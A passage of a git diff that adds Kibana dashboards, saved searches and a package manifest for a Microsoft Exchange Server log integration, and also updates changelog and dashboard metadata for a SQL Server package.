"embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b3936adc-f4db-45b1-845e-a13a7c890d2c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Hosts", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "b3936adc-f4db-45b1-845e-a13a7c890d2c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "2997a185-6ea5-4e41-bd70-f5a46bd4e127", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "2997a185-6ea5-4e41-bd70-f5a46bd4e127", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f50b399c-7fd8-43f7-8464-fcf7127eb0c4": { + "columnOrder": [ + "d782126e-8851-4571-9253-98e8f5dc345d", + "61f96ba6-2d0f-485b-aaff-28c6acf281db", + "bc81f4da-631d-49c4-b5c8-27de3d250b82" + ], + "columns": { + "61f96ba6-2d0f-485b-aaff-28c6acf281db": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bc81f4da-631d-49c4-b5c8-27de3d250b82": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count of requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d782126e-8851-4571-9253-98e8f5dc345d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc81f4da-631d-49c4-b5c8-27de3d250b82", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bc81f4da-631d-49c4-b5c8-27de3d250b82" + ], + "layerId": "f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d782126e-8851-4571-9253-98e8f5dc345d", + "xAccessor": "61f96ba6-2d0f-485b-aaff-28c6acf281db" + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "dataBounds" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3", + "w": 48, + "x": 0, + "y": 6 + }, + "panelIndex": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2f74c5df-c534-4145-a74f-8489c346879e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "02cf54a3-79f3-4c18-be82-96e2f2f2180a": { + "dataType": "number", + "isBucketed": true, + "label": "Top 15 values of http.response.status_code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" + }, + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.urlhost", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "2f74c5df-c534-4145-a74f-8489c346879e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "hide", + "metrics": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "0720a83e-43d7-4993-8072-26be8aa3feb6", + "w": 16, + "x": 0, + "y": 15 + }, + "panelIndex": "0720a83e-43d7-4993-8072-26be8aa3feb6", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "af78ff4d-82f1-410b-8478-0732fffc9e5b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "02cf54a3-79f3-4c18-be82-96e2f2f2180a": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.authenticateduser", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.authenticateduser" + }, + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.urlhost", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "af78ff4d-82f1-410b-8478-0732fffc9e5b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "hide", + "metrics": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "70ef3233-def0-42d0-9b35-2e48221fcd16", + "w": 16, + "x": 16, + "y": 15 + }, + "panelIndex": "70ef3233-def0-42d0-9b35-2e48221fcd16", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c9c5c37e-da56-4106-b488-560a5da4a1f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c" + ], + "columns": { + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.authenticateduser", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.authenticateduser" + }, + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "c9c5c37e-da56-4106-b488-560a5da4a1f8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb", + "w": 16, + "x": 32, + "y": 15 + }, + "panelIndex": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 27, + "i": "f2260518-d4c1-4b3b-a602-c18c06fc1562", + "w": 48, + "x": 0, + "y": 30 + }, + "panelIndex": "f2260518-d4c1-4b3b-a602-c18c06fc1562", + "panelRefName": "panel_f2260518-d4c1-4b3b-a602-c18c06fc1562", + "type": "search" + } + ], + "timeRestore": false, + "title": "[Logs Exchange Server] HTTPProxy", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:15:01.086Z", + "id": "microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88", + "managed": true, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2e19276-b24c-4239-ab0f-3b9c328fb252:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2e19276-b24c-4239-ab0f-3b9c328fb252:e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8a0f3277-f4af-40f5-9526-0b8be36b2daf:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8cd05d59-543a-4b41-9bdd-49b7b8e2cd31:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba:db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91:7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2997a185-6ea5-4e41-bd70-f5a46bd4e127:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2997a185-6ea5-4e41-bd70-f5a46bd4e127:b3936adc-f4db-45b1-845e-a13a7c890d2c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3:indexpattern-datasource-layer-f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3:46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0720a83e-43d7-4993-8072-26be8aa3feb6:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0720a83e-43d7-4993-8072-26be8aa3feb6:2f74c5df-c534-4145-a74f-8489c346879e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "70ef3233-def0-42d0-9b35-2e48221fcd16:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "70ef3233-def0-42d0-9b35-2e48221fcd16:af78ff4d-82f1-410b-8478-0732fffc9e5b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb:c9c5c37e-da56-4106-b488-560a5da4a1f8", + "type": "index-pattern" + }, + { + "id": "microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af", + "name": "f2260518-d4c1-4b3b-a602-c18c06fc1562:panel_f2260518-d4c1-4b3b-a602-c18c06fc1562", + "type": "search" + }, + { + "id": "logs-*", + "name": "controlGroup_a5fe2192-b77c-4f16-888e-4e59fe064c78:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_f542c63c-4265-4ebc-a9d6-7278f4d3976a:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} diff --git a/packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json similarity index 57% rename from packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json rename to packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json index cee2784d89d..1beffc5ea94 100644 --- a/packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json +++ b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json @@ -1,14 +1,18 @@ { "attributes": { "columns": [ - "user.name", - "winlog.logon.type", - "source.domain", - "source.ip", - "winlog.logon.id" + "http.request.bytes", + "http.response.bytes", + "http.response.status_code", + "microsoft.exchange.anchormailbox", + "microsoft.exchange.authenticateduser", + "microsoft.exchange.urlhost", + "microsoft.exchange.totalrequesttime" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -20,30 +24,25 @@ "alias": null, "disabled": false, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", + "key": "data_stream.dataset", "negate": false, "params": { - "query": "4624" + "query": "microsoft_exchange_server.httpproxy" }, "type": "phrase" }, "query": { - "match": { - "event.code": { - "query": "4624", - "type": "phrase" - } + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" } } } ], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true + "query": "" + } } }, "sort": [ @@ -52,15 +51,15 @@ "desc" ] ], - "title": "User Logons [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-ce71c9a0-a25e-11e9-a422-d144027429da", - "migrationVersion": { - "search": "8.0.0" + "timeRestore": false, + "title": "[Logs Exchange Server] HTTP Proxy Requests", + "usesAdHocDataView": false, + "viewMode": "documents" }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af", + "managed": true, "references": [ { "id": "logs-*", @@ -73,5 +72,6 @@ "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json similarity index 67% rename from packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json rename to packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json index 95c1065fc34..0dacd4c026d 100644 --- a/packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json +++ b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json @@ -1,25 +1,17 @@ { "attributes": { "columns": [ - "microsoft_sqlserver.log.origin", - "message", - "event.original" + "email.direction", + "email.from.address", + "email.to.address", + "email.subject", + "email.message_id", + "network.bytes" ], - "description": "Microsoft SQL server Error Log", - "grid": { - "columns": { - "log.level": { - "width": 119 - }, - "message": { - "width": 336.33333333333337 - }, - "microsoft_sqlserver.log.origin": { - "width": 218.33333333333331 - } - } - }, + "description": "", + "grid": {}, "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -30,17 +22,18 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "key": "data_stream.dataset", "negate": false, "params": { - "query": "microsoft_sqlserver.log" + "query": "microsoft_exchange_server.messagetracking" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "microsoft_sqlserver.log" + "data_stream.dataset": "microsoft_exchange_server.messagetracking" } } } @@ -58,13 +51,14 @@ "desc" ] ], - "title": "Microsoft SQL server Error Log" - }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3", - "migrationVersion": { - "search": "8.0.0" + "timeRestore": false, + "title": "[Logs Exchange Server] Messagetracking", + "usesAdHocDataView": false }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af", + "managed": true, "references": [ { "id": "logs-*", @@ -77,5 +71,6 @@ "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/microsoft_exchange_server/manifest.yml b/packages/microsoft_exchange_server/manifest.yml new file mode 100644 index 00000000000..1b62ad6d1d6 --- /dev/null +++ b/packages/microsoft_exchange_server/manifest.yml @@ -0,0 +1,45 @@ +format_version: 3.0.3 +name: microsoft_exchange_server +title: "Microsoft Exchange Server" +version: 0.1.2 +source: + license: "Elastic-2.0" +description: Collect logs from Microsoft Exchange Server with Elastic Agent. +type: integration +categories: + - security +conditions: + kibana: + version: "^8.10.1" + elastic: + subscription: "basic" +screenshots: + - src: /img/screenshot_messagtracking.png + title: Screenshot MessageTracking Dashboard + size: 600x600 + type: image/png + - src: /img/screenshot_httpproxy.png + title: Screenshot HTTPProxy Dashboard + size: 600x600 + type: image/png +icons: + - src: /img/exchange.svg + title: Exchange Server logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: microsoft_exchange_server + title: Microsoft Exchange Server + description: Microsoft Exchange Server Logs + data_streams: + - smtp + - httpproxy + - messagetracking + - imap4_pop3 + inputs: + - type: filestream + title: Collect Microsoft Exchange Server Logs from file + description: Microsoft Exchange Server Logs +owner: + github: elastic/sec-windows-platform + type: community diff --git a/packages/microsoft_exchange_server/validation.yml b/packages/microsoft_exchange_server/validation.yml new file mode 100644 index 00000000000..1189aa63c89 --- /dev/null +++ b/packages/microsoft_exchange_server/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00004 # References in dashboards. diff --git a/packages/microsoft_sqlserver/changelog.yml b/packages/microsoft_sqlserver/changelog.yml index 508a5afe6dc..fd3f9fbd5a7 100644 --- a/packages/microsoft_sqlserver/changelog.yml +++ b/packages/microsoft_sqlserver/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: 2.5.0 + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "2.4.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/9053 - version: 2.4.0 changes: - description: Update the "Microsoft SQL Server Transaction log" dashboard. diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json index 0e3a023d726..b0df96ee7de 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMSwxXQ==", "attributes": { "controlGroupInput": { "chainingSystem": "HIERARCHICAL", @@ -1277,10 +1288,6 @@ "title": "[Metrics Microsoft SQL Server] Transaction log", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-11-10T10:41:08.548Z", - "id": "microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b", - "managed": false, "references": [ { "id": "metrics-*", @@ -1333,8 +1340,7 @@ "type": "index-pattern" } ], - "type": "dashboard", - "migrationVersion": { - "dashboard": "8.9.0" - } + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json index f083eea8e31..96f4d45fdc9 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb", + "type": "dashboard", + "namespaces": [ + "default" + 